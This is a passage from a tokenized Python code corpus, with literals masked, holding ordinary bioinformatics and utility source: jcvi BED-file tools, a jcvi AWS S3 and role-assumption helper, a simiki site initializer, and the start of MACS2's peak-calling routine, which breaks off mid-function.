x for x in all_dist if x [ <NUM_LIT:1> ] == mateorientation ] <EOL> if cutoff <= <NUM_LIT:0> : <EOL> dists = np . array ( [ x [ <NUM_LIT:0> ] for x in all_dist ] , dtype = "<STR_LIT:int>" ) <EOL> p0 = analyze_dists ( dists , cutoff = mpcutoff ) <EOL> cutoff = int ( <NUM_LIT:2> * p0 ) <EOL> cutoff = int ( math . ceil ( cutoff / bins ) ) * bins <EOL> logging . debug ( "<STR_LIT>" . format ( cutoff ) + <EOL> "<STR_LIT>" ) <EOL> for dist , orientation , aquery , bquery in all_dist : <EOL> if dist > cutoff : <EOL> continue <EOL> if cutoff > <NUM_LIT:2> * mpcutoff and dist < mpcutoff : <EOL> continue <EOL> linked_dist . append ( dist ) <EOL> if pairsfile : <EOL> print >> pairsfw , "<STR_LIT>" . format ( aquery , bquery , dist ) <EOL> orientations [ orientation ] += <NUM_LIT:1> <EOL> print >> sys . stderr , "<STR_LIT>" . format ( num_fragments , num_pairs , num_fragments + num_pairs * <NUM_LIT:2> ) <EOL> s = SummaryStats ( linked_dist , dtype = "<STR_LIT:int>" ) <EOL> num_links = s . size <EOL> meandist , stdev = s . mean , s . 
sd <EOL> p0 , p1 , p2 = s . median , s . p1 , s . p2 <EOL> print >> sys . stderr , "<STR_LIT>" % ( num_links , num_links * <NUM_LIT> / num_pairs , cutoff ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( meandist , stdev ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( p0 ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( p1 , p2 ) <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> orientation_summary = [ ] <EOL> for orientation , count in sorted ( orientations . items ( ) ) : <EOL> o = "<STR_LIT>" . format ( orientation , percentage ( count , num_links , mode = <NUM_LIT:1> ) ) <EOL> orientation_summary . append ( o . split ( ) [ <NUM_LIT:0> ] ) <EOL> print >> sys . stderr , o <EOL> if insertsfile : <EOL> from jcvi . graphics . histogram import histogram <EOL> print >> insertsfw , "<STR_LIT:\n>" . join ( str ( x ) for x in linked_dist ) <EOL> insertsfw . close ( ) <EOL> prefix = insertsfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if prefix > <NUM_LIT:10> : <EOL> prefix = prefix . split ( "<STR_LIT:->" ) [ <NUM_LIT:0> ] <EOL> osummary = "<STR_LIT:U+0020>" . join ( orientation_summary ) <EOL> title = "<STR_LIT>" . format ( prefix , osummary , p0 ) <EOL> histogram ( insertsfile , vmin = <NUM_LIT:0> , vmax = cutoff , bins = bins , <EOL> xlabel = "<STR_LIT>" , title = title , ascii = ascii ) <EOL> if op . exists ( insertsfile ) : <EOL> os . remove ( insertsfile ) <EOL> return s <EOL> def pairs ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( pairs . __doc__ ) <EOL> p . set_pairs ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> basename = bedfile . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] <EOL> insertsfile = "<STR_LIT:.>" . join ( ( basename , "<STR_LIT>" ) ) <EOL> bedfile = sort ( [ bedfile , "<STR_LIT>" ] ) <EOL> fp = open ( bedfile ) <EOL> data = [ BedLine ( row ) for i , row in enumerate ( fp ) if i < opts . 
nrows ] <EOL> ascii = not opts . pdf <EOL> return bedfile , report_pairs ( data , opts . cutoff , opts . mateorientation , <EOL> pairsfile = opts . pairsfile , insertsfile = insertsfile , <EOL> rclip = opts . rclip , ascii = ascii , bins = opts . bins , <EOL> distmode = opts . distmode ) <EOL> def summary ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( summary . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> bed = Bed ( bedfile ) <EOL> bs = BedSummary ( bed ) <EOL> if opts . sizes : <EOL> sizesfile = bedfile + "<STR_LIT>" <EOL> fw = open ( sizesfile , "<STR_LIT:w>" ) <EOL> for span , accn in bs . mspans : <EOL> print >> fw , span <EOL> fw . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( sizesfile ) ) <EOL> return bs <EOL> if not opts . all : <EOL> bs . report ( ) <EOL> return bs <EOL> for seqid , subbeds in bed . sub_beds ( ) : <EOL> bs = BedSummary ( subbeds ) <EOL> print "<STR_LIT:\t>" . join ( ( seqid , str ( bs ) ) ) <EOL> def sort ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( sort . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_outfile ( outfile = None ) <EOL> p . set_tmpdir ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . 
print_help ( ) ) <EOL> bedfile , = args <EOL> inplace = opts . inplace <EOL> if not inplace and "<STR_LIT>" in bedfile : <EOL> return bedfile <EOL> sortedbed = opts . outfile <EOL> if inplace : <EOL> sortedbed = bedfile <EOL> elif opts . outfile is None : <EOL> pf , sf = op . basename ( bedfile ) . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) <EOL> sortedbed = pf + "<STR_LIT>" + sf <EOL> sortopt = "<STR_LIT>" if not opts . accn else "<STR_LIT>" <EOL> cmd = "<STR_LIT>" <EOL> if opts . tmpdir : <EOL> cmd += "<STR_LIT>" . format ( opts . tmpdir ) <EOL> if opts . unique : <EOL> cmd += "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . format ( sortopt , bedfile , sortedbed ) <EOL> if inplace or need_update ( bedfile , sortedbed ) : <EOL> sh ( cmd ) <EOL> return sortedbed <EOL> def mates ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( mates . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_mates ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> rclip = opts . rclip <EOL> key = ( lambda x : x . accn [ : - rclip ] ) if rclip else ( lambda x : x . accn ) <EOL> bed = Bed ( bedfile , key = key ) <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> matesfile = pf + "<STR_LIT>" <EOL> lib = pf if opts . lib else None <EOL> fw = open ( matesfile , "<STR_LIT:w>" ) <EOL> if lib : <EOL> bedfile , stats = pairs ( [ bedfile , "<STR_LIT>" . format ( rclip ) , <EOL> "<STR_LIT>" . format ( opts . cutoff ) ] ) <EOL> sv = int ( <NUM_LIT:2> * stats . sd ) <EOL> mindist = max ( stats . mean - sv , <NUM_LIT:1> ) <EOL> maxdist = stats . 
mean + sv <EOL> print >> fw , "<STR_LIT:\t>" . join ( str ( x ) for x in ( "<STR_LIT>" , pf , mindist , maxdist ) ) <EOL> num_fragments = num_pairs = <NUM_LIT:0> <EOL> matesbedfile = matesfile + "<STR_LIT>" <EOL> fwm = open ( matesbedfile , "<STR_LIT:w>" ) <EOL> for pe , lines in groupby ( bed , key = key ) : <EOL> lines = list ( lines ) <EOL> if len ( lines ) != <NUM_LIT:2> : <EOL> num_fragments += len ( lines ) <EOL> continue <EOL> a , b = lines <EOL> if opts . nointra and a . seqid == b . seqid : <EOL> continue <EOL> if opts . prefix : <EOL> aprefix = a . seqid . split ( "<STR_LIT:_>" ) [ <NUM_LIT:0> ] <EOL> bprefix = b . seqid . split ( "<STR_LIT:_>" ) [ <NUM_LIT:0> ] <EOL> if aprefix != bprefix : <EOL> continue <EOL> num_pairs += <NUM_LIT:1> <EOL> pair = [ a . accn , b . accn ] <EOL> if lib : <EOL> pair . append ( lib ) <EOL> print >> fw , "<STR_LIT:\t>" . join ( pair ) <EOL> print >> fwm , a <EOL> print >> fwm , b <EOL> logging . debug ( "<STR_LIT>" . format ( num_fragments , num_pairs , matesfile , matesbedfile ) ) <EOL> fw . close ( ) <EOL> fwm . close ( ) <EOL> return matesfile , matesbedfile <EOL> def flanking ( args ) : <EOL> """<STR_LIT>""" <EOL> from numpy import array , argsort <EOL> p = OptionParser ( flanking . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = None , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = None , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:10> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , choices = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = None , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if any ( [ len ( args ) != <NUM_LIT:1> , opts . chrom is None , opts . 
coord is None ] ) : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> position = ( opts . chrom , opts . coord ) <EOL> n , side , maxd = opts . n , opts . side , opts . max_d <EOL> chrombed = Bed ( bedfile ) . sub_bed ( position [ <NUM_LIT:0> ] ) <EOL> if side == "<STR_LIT>" : <EOL> data = [ ( abs ( f . start - position [ <NUM_LIT:1> ] ) , f ) for f in chrombed if f . start <= position [ <NUM_LIT:1> ] ] <EOL> elif side == "<STR_LIT>" : <EOL> data = [ ( abs ( f . start - position [ <NUM_LIT:1> ] ) , f ) for f in chrombed if f . start >= position [ <NUM_LIT:1> ] ] <EOL> else : <EOL> data = [ ( abs ( f . start - position [ <NUM_LIT:1> ] ) , f ) for f in chrombed ] <EOL> if maxd : <EOL> data = [ f for f in data if f [ <NUM_LIT:0> ] <= maxd ] <EOL> n += <NUM_LIT:1> <EOL> n = min ( n , len ( data ) ) <EOL> distances , subbed = zip ( * data ) <EOL> distances = array ( distances ) <EOL> idx = argsort ( distances ) [ : n ] <EOL> flankingbed = [ f for ( i , f ) in enumerate ( subbed ) if i in idx ] <EOL> fw = must_open ( opts . outfile , "<STR_LIT:w>" ) <EOL> for atom in flankingbed : <EOL> print >> fw , str ( atom ) <EOL> return ( position , flankingbed ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os . path as op <EOL> import sys <EOL> import fnmatch <EOL> import boto3 <EOL> from jcvi . formats . base import SetFile <EOL> from jcvi . apps . base import OptionParser , ActionDispatcher , popen , sh <EOL> def main ( ) : <EOL> actions = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> p = ActionDispatcher ( actions ) <EOL> p . dispatch ( globals ( ) ) <EOL> def glob_s3 ( store , keys = None ) : <EOL> store , cards = store . rsplit ( "<STR_LIT:/>" , <NUM_LIT:1> ) <EOL> contents = ls_s3 ( store ) <EOL> if keys : <EOL> filtered = [ x for x in contents if op . basename ( x ) . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] in keys ] <EOL> else : <EOL> filtered = fnmatch . filter ( contents , cards ) <EOL> filtered = [ "<STR_LIT:/>" . join ( ( store , x ) ) for x in filtered ] <EOL> return filtered <EOL> def rm_s3 ( store ) : <EOL> cmd = "<STR_LIT>" . format ( store ) <EOL> sh ( cmd ) <EOL> def rm ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( rm . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> store , = args <EOL> contents = glob_s3 ( store ) <EOL> for c in contents : <EOL> rm_s3 ( c ) <EOL> def cp ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( cp . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = False , <EOL> action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> store , folder = args <EOL> contents = glob_s3 ( store ) <EOL> for c in contents : <EOL> oc = op . basename ( c ) <EOL> tc = op . join ( folder , oc ) <EOL> if opts . force or not op . exists ( tc ) : <EOL> pull_from_s3 ( c ) <EOL> def ls ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( ls . 
__doc__ ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> store , = args <EOL> keys = opts . keys <EOL> if keys : <EOL> keys = SetFile ( keys ) <EOL> print "<STR_LIT:\n>" . join ( glob_s3 ( store , keys = keys ) ) <EOL> def s3ify ( address ) : <EOL> if not address . startswith ( "<STR_LIT>" ) : <EOL> address = "<STR_LIT>" + address . lstrip ( "<STR_LIT:/>" ) <EOL> return address <EOL> def push_to_s3 ( s3_store , obj_name ) : <EOL> cmd = "<STR_LIT>" if op . isdir ( obj_name ) else "<STR_LIT>" <EOL> s3address = "<STR_LIT>" . format ( s3_store , obj_name ) <EOL> s3address = s3ify ( s3address ) <EOL> cmd = "<STR_LIT>" . format ( cmd , obj_name , s3address ) <EOL> sh ( cmd ) <EOL> return s3address <EOL> def pull_from_s3 ( s3_store , file_name = None , overwrite = True ) : <EOL> is_dir = s3_store . endswith ( "<STR_LIT:/>" ) <EOL> if is_dir : <EOL> s3_store = s3_store . rstrip ( "<STR_LIT:/>" ) <EOL> file_name = file_name or s3_store . split ( "<STR_LIT:/>" ) [ - <NUM_LIT:1> ] <EOL> if not op . exists ( file_name ) : <EOL> s3_store = s3ify ( s3_store ) <EOL> if overwrite or ( not op . exists ( file_name ) ) : <EOL> cmd = "<STR_LIT>" . format ( s3_store , file_name ) <EOL> if is_dir : <EOL> cmd += "<STR_LIT>" <EOL> sh ( cmd ) <EOL> return op . abspath ( file_name ) <EOL> def ls_s3 ( s3_store_obj_name ) : <EOL> s3_store_obj_name = s3ify ( s3_store_obj_name ) <EOL> cmd = "<STR_LIT>" . format ( s3_store_obj_name ) <EOL> contents = [ ] <EOL> for row in popen ( cmd ) : <EOL> contents . append ( row . split ( ) [ - <NUM_LIT:1> ] ) <EOL> return contents <EOL> def check_exists_s3 ( s3_store_obj_name ) : <EOL> s3_store_obj_name = s3ify ( s3_store_obj_name ) <EOL> cmd = "<STR_LIT>" . format ( s3_store_obj_name ) <EOL> counts = int ( popen ( cmd ) . 
read ( ) ) <EOL> return counts != <NUM_LIT:0> <EOL> def aws_configure ( profile , key , value ) : <EOL> sh ( '<STR_LIT>' . format ( profile , key , value ) ) <EOL> def role ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( role . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) == <NUM_LIT:1> and args [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> args = "<STR_LIT>" . split ( ) <EOL> if len ( args ) != <NUM_LIT:4> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> src_acct , src_username , dst_acct , dst_role = args <EOL> region = '<STR_LIT>' <EOL> mfa_token = raw_input ( '<STR_LIT>' ) <EOL> boto3 . setup_default_session ( profile_name = '<STR_LIT:default>' ) <EOL> client = boto3 . client ( '<STR_LIT>' ) <EOL> response = client . assume_role ( RoleArn = "<STR_LIT>" + dst_acct + "<STR_LIT>" + dst_role , <EOL> RoleSessionName = dst_role , <EOL> SerialNumber = "<STR_LIT>" + src_acct + "<STR_LIT>" + src_username , <EOL> TokenCode = mfa_token ) <EOL> creds = response [ '<STR_LIT>' ] <EOL> aws_configure ( dst_role , '<STR_LIT>' , creds [ '<STR_LIT>' ] ) <EOL> aws_configure ( dst_role , '<STR_LIT>' , creds [ '<STR_LIT>' ] ) <EOL> aws_configure ( dst_role , '<STR_LIT>' , creds [ '<STR_LIT>' ] ) <EOL> aws_configure ( dst_role , '<STR_LIT>' , region ) <EOL> print dst_role <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from __future__ import print_function , unicode_literals , absolute_import <EOL> import os <EOL> import os . path <EOL> import shutil <EOL> import logging <EOL> from simiki . config import parse_config <EOL> from simiki . utils import ( copytree , mkdir_p , listdir_nohidden ) <EOL> class Initiator ( object ) : <EOL> conf_template_dn = "<STR_LIT>" <EOL> config_fn = "<STR_LIT>" <EOL> fabfile_fn = "<STR_LIT>" <EOL> demo_fn = "<STR_LIT>" <EOL> def __init__ ( self , config_file , target_path ) : <EOL> self . config_file = config_file <EOL> self . config = parse_config ( self . config_file ) <EOL> self . source_path = os . path . dirname ( __file__ ) <EOL> self . target_path = target_path <EOL> @ staticmethod <EOL> def get_file ( src , dst ) : <EOL> if os . path . exists ( dst ) : <EOL> logging . warning ( "<STR_LIT>" . format ( dst ) ) <EOL> return <EOL> dst_directory = os . path . dirname ( dst ) <EOL> if not os . path . exists ( dst_directory ) : <EOL> mkdir_p ( dst_directory ) <EOL> logging . info ( "<STR_LIT>" . format ( dst_directory ) ) <EOL> shutil . copyfile ( src , dst ) <EOL> logging . info ( "<STR_LIT>" . format ( dst ) ) <EOL> def get_config_file ( self ) : <EOL> dst_config_file = os . path . join ( self . target_path , self . config_fn ) <EOL> self . get_file ( self . config_file , dst_config_file ) <EOL> def get_fabfile ( self ) : <EOL> src_fabfile = os . path . join ( <EOL> self . source_path , <EOL> self . conf_template_dn , <EOL> self . fabfile_fn <EOL> ) <EOL> dst_fabfile = os . path . join ( self . target_path , self . fabfile_fn ) <EOL> self . get_file ( src_fabfile , dst_fabfile ) <EOL> def get_demo_page ( self ) : <EOL> nohidden_dir = listdir_nohidden ( <EOL> os . path . join ( self . target_path , self . config [ '<STR_LIT:source>' ] ) ) <EOL> if next ( nohidden_dir , False ) : <EOL> return <EOL> src_demo = os . path . join ( self . source_path , self . conf_template_dn , <EOL> self . demo_fn ) <EOL> dst_demo = os . path . join ( self . 
target_path , "<STR_LIT:content>" , "<STR_LIT>" , <EOL> self . demo_fn ) <EOL> self . get_file ( src_demo , dst_demo ) <EOL> def get_default_theme ( self , theme_path ) : <EOL> default_theme_name = self . config [ '<STR_LIT>' ] <EOL> src_theme = os . path . join ( self . source_path , self . config [ '<STR_LIT>' ] , <EOL> default_theme_name ) <EOL> dst_theme = os . path . join ( theme_path , default_theme_name ) <EOL> if os . path . exists ( dst_theme ) : <EOL> logging . warning ( '<STR_LIT>' . format ( dst_theme ) ) <EOL> else : <EOL> copytree ( src_theme , dst_theme ) <EOL> logging . info ( "<STR_LIT>" <EOL> . format ( default_theme_name , theme_path ) ) <EOL> def init ( self ) : <EOL> content_path = os . path . join ( self . target_path , self . config [ "<STR_LIT:source>" ] ) <EOL> output_path = os . path . join ( self . target_path , <EOL> self . config [ "<STR_LIT>" ] ) <EOL> theme_path = os . path . join ( self . target_path , self . config [ '<STR_LIT>' ] ) <EOL> for path in ( content_path , output_path , theme_path ) : <EOL> if os . path . exists ( path ) : <EOL> logging . warning ( "<STR_LIT>" . format ( path ) ) <EOL> else : <EOL> mkdir_p ( path ) <EOL> logging . info ( "<STR_LIT>" . format ( path ) ) <EOL> self . get_config_file ( ) <EOL> self . get_fabfile ( ) <EOL> self . get_demo_page ( ) <EOL> self . get_default_theme ( theme_path ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import logging <EOL> from time import strftime <EOL> import tempfile <EOL> from MACS2 . OptValidator import opt_validate <EOL> from MACS2 . OutputWriter import * <EOL> from MACS2 . Prob import binomial_cdf_inv <EOL> from MACS2 . PeakModel import PeakModel , NotEnoughPairsException <EOL> from MACS2 . PeakDetect import PeakDetect <EOL> from MACS2 . Constants import * <EOL> def check_names ( treat , control , error_stream ) : <EOL> """<STR_LIT>""" <EOL> tchrnames = set ( treat . get_chr_names ( ) ) <EOL> cchrnames = set ( control . get_chr_names ( ) ) <EOL> commonnames = tchrnames . intersection ( cchrnames ) <EOL> if len ( commonnames ) == <NUM_LIT:0> : <EOL> error_stream ( "<STR_LIT>" ) <EOL> error_stream ( "<STR_LIT>" % "<STR_LIT:U+002C>" . join ( sorted ( tchrnames ) ) ) <EOL> error_stream ( "<STR_LIT>" % "<STR_LIT:U+002C>" . join ( sorted ( cchrnames ) ) ) <EOL> sys . exit ( ) <EOL> def run ( args ) : <EOL> """<STR_LIT>""" <EOL> options = opt_validate ( args ) <EOL> info = options . info <EOL> warn = options . warn <EOL> debug = options . debug <EOL> error = options . error <EOL> info ( "<STR_LIT:\n>" + options . argtxt ) <EOL> options . PE_MODE = options . format in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if options . PE_MODE : tag = '<STR_LIT>' <EOL> else : tag = '<STR_LIT>' <EOL> tempfile . tempdir = options . tempdir <EOL> info ( "<STR_LIT>" , tag ) <EOL> if options . PE_MODE : ( treat , control ) = load_frag_files_options ( options ) <EOL> else : ( treat , control ) = load_tag_files_options ( options ) <EOL> if control is not None : check_names ( treat , control , error ) <EOL> info ( "<STR_LIT>" , tag , options . tsize ) <EOL> tagsinfo = "<STR_LIT>" % ( tag , options . tsize ) <EOL> t0 = treat . total <EOL> tagsinfo += "<STR_LIT>" % ( tag , t0 ) <EOL> info ( "<STR_LIT>" , tag , t0 ) <EOL> if options . keepduplicates != "<STR_LIT:all>" : <EOL> if options . 
keepduplicates == "<STR_LIT>" : <EOL> info ( "<STR_LIT>" , tag ) <EOL> treatment_max_dup_tags = cal_max_dup_tags ( options . gsize , t0 ) <EOL> info ( "<STR_LIT>" % ( treatment_max_dup_tags ) ) <EOL> else : <EOL> info ( "<STR_LIT>" , tag ) <EOL> treatment_max_dup_tags = int ( options . keepduplicates ) <EOL> if options . PE_MODE : <EOL> info ( "<STR_LIT>" , treatment_max_dup_tags ) <EOL> else : <EOL> info ( "<STR_LIT>" , treatment_max_dup_tags ) <EOL> treat . separate_dups ( treatment_max_dup_tags ) <EOL> t1 = treat . total <EOL> info ( "<STR_LIT>" , tag , t1 ) <EOL> tagsinfo += "<STR_LIT>" % ( tag , t1 ) <EOL> if options . PE_MODE : <EOL> tagsinfo += "<STR_LIT>" % ( treatment_max_dup_tags ) <EOL> else : <EOL> tagsinfo += "<STR_LIT>" % ( treatment_max_dup_tags ) <EOL> info ( "<STR_LIT>" , float ( t0 - t1 ) / t0 ) <EOL> tagsinfo += "<STR_LIT>" % ( float ( t0 - t1 ) / t0 ) <EOL> else : <EOL> t1 = t0 <EOL> if control is not None : <EOL> c0 = control . total <EOL> tagsinfo += "<STR_LIT>" % ( tag , c0 ) <EOL> info ( "<STR_LIT>" , tag , c0 ) <EOL> if options . keepduplicates != "<STR_LIT:all>" : <EOL> if options . keepduplicates == "<STR_LIT>" : <EOL> info ( "<STR_LIT>" , tag ) <EOL> control_max_dup_tags = cal_max_dup_tags ( options . gsize , c0 ) <EOL> info ( "<STR_LIT>" % ( control_max_dup_tags ) ) <EOL> else : <EOL> info ( "<STR_LIT>" , tag ) <EOL> control_max_dup_tags = int ( options . keepduplicates ) <EOL> if options . PE_MODE : <EOL> info ( "<STR_LIT>" , treatment_max_dup_tags ) <EOL> else : <EOL> info ( "<STR_LIT>" , treatment_max_dup_tags ) <EOL> control . separate_dups ( treatment_max_dup_tags ) <EOL> c1 = control . total <EOL> info ( "<STR_LIT>" , tag , c1 ) <EOL> tagsinfo += "<STR_LIT>" % ( tag , c1 ) <EOL> if options . 
PE_MODE : <EOL> tagsinfo += "<STR_LIT>" % ( treatment_max_dup_tags ) <EOL> else : <EOL> tagsinfo += "<STR_LIT>" % ( treatment_max_dup_tags ) <EOL> info ( "<STR_LIT>" % ( float ( c0 - c1 ) / c0 ) ) <EOL> tagsinfo += "<STR_LIT>" % ( float ( c0 - c1 ) / c0 ) <EOL> else : <EOL> c1 = c0 <EOL> info ( "<STR_LIT>" ) <EOL> info ( "<STR_LIT>" ) <EOL> if options . nomodel : <EOL> info ( "<STR_LIT>" ) <EOL> if options . PE_MODE : <EOL> options . d = options . tsize <EOL> else : <EOL> options . d = options . extsize <EOL> if options . shift > <NUM_LIT:0> : <EOL> info ( "<STR_LIT>" % ( options . shift ) ) <EOL> elif options . shift < <NUM_LIT:0> : <EOL> info ( "<STR_LIT>" % ( options . shift * - <NUM_LIT:1> ) ) <EOL> info ( "<STR_LIT>" % ( options . d ) ) <EOL> options . scanwindow = <NUM_LIT:2> * options . d <EOL> else : <EOL> try : <EOL> peakmodel = PeakModel ( treatment = treat , <EOL> max_pairnum = MAX_PAIRNUM , <EOL> opt = options <EOL> ) <EOL> info ( "<STR_LIT>" ) <EOL> debug ( "<STR_LIT>" ) <EOL> debug ( "<STR_LIT>" % ( peakmodel . min_tags ) ) <EOL> debug ( "<STR_LIT>" % ( peakmodel . d ) ) <EOL> debug ( "<STR_LIT>" % ( peakmodel . scan_window ) ) <EOL> info ( "<STR_LIT>" % peakmodel . d ) <EOL> info ( "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( map ( str , peakmodel . alternative_d ) ) ) <EOL> info ( "<STR_LIT>" % ( options . modelR ) ) <EOL> model2r_script ( peakmodel , options . modelR , options . name ) <EOL> options . d = peakmodel . d <EOL> options . scanwindow = <NUM_LIT:2> * options . d <EOL> if options . d <= <NUM_LIT:2> * options . tsize : <EOL> warn ( "<STR_LIT>" % ( options . d ) ) <EOL> if options . onauto : <EOL> options . d = options . extsize <EOL> options . scanwindow = <NUM_LIT:2> * options . d <EOL> warn ( "<STR_LIT>" % ( options . d ) ) <EOL> else : <EOL> warn ( "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( map ( str , peakmodel . alternative_d ) ) ) <EOL> warn ( "<STR_LIT>" ) <EOL> except NotEnoughPairsException : <EOL> if not options . 
onauto : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> warn ( "<STR_LIT>" ) <EOL> options . d = options . extsize <EOL> options . scanwindow = <NUM_LIT:2> * options . d <EOL> warn ( "<STR_LIT>" % ( options . d ) ) <EOL> info ( "<STR_LIT>" ) <EOL> if options . nolambda : <EOL> info ( "<STR_LIT>" ) <EOL> if control and options . PE_MODE : <EOL> c1 = c1 * <NUM_LIT:2> <EOL> if control : <EOL> if options . downsample : <EOL> info ( "<STR_LIT>" ) <EOL> if t1 > c1 : <EOL> info ( "<STR_LIT>" , tag ) <EOL> if options . seed < <NUM_LIT:0> : <EOL> warn ( "<STR_LIT>" ) <EOL> else : <EOL> info ( "<STR_LIT>" % options . seed ) <EOL> treat . sample_num ( c1 , options . seed ) <EOL> info ( "<STR_LIT>" , treat . total ) <EOL> elif c1 > t1 : <EOL> info ( "<STR_LIT>" , tag ) <EOL> if options . seed < <NUM_LIT:0> : <EOL> warn ( "<STR_LIT>" ) <EOL> else : <EOL> info ( "<STR_LIT>" % options . seed ) <EOL> control . sample_num ( t1 , options . seed ) <EOL> info ( "<STR_LIT>" , control . total , tag ) <EOL> options . tocontrol = False <EOL> else : <EOL> if options . tolarge : <EOL> if t1 > c1 : <EOL> options . tocontrol = False <EOL> else : <EOL> options . tocontrol = True <EOL> else : <EOL> if t1 > c1 : <EOL> options . tocontrol = True <EOL> else : <EOL> options . tocontrol = False <EOL> peakdetect = PeakDetect ( treat = treat , <EOL> control = control , <EOL> opt = options <EOL> ) <EOL> peakdetect . call_peaks ( ) <EOL> peakdetect . peaks . filter_fc ( fc_low = options . fecutoff ) <EOL> info ( "<STR_LIT>" % ( options . peakxls ) ) <EOL> ofhd_xls = open ( options . peakxls , "<STR_LIT:w>" ) <EOL> ofhd_xls . write ( "<STR_LIT>" % ( MACS_VERSION ) ) <EOL> ofhd_xls . write ( options . argtxt + "<STR_LIT:\n>" ) <EOL> ofhd_xls . write ( tagsinfo ) <EOL> if options . shift > <NUM_LIT:0> : <EOL> ofhd_xls . write ( "<STR_LIT>" % ( options . shift ) ) <EOL> elif options . shift < <NUM_LIT:0> : <EOL> ofhd_xls . write ( "<STR_LIT>" % ( options . shift * - <NUM_LIT:1> ) ) <EOL> ofhd_xls . 
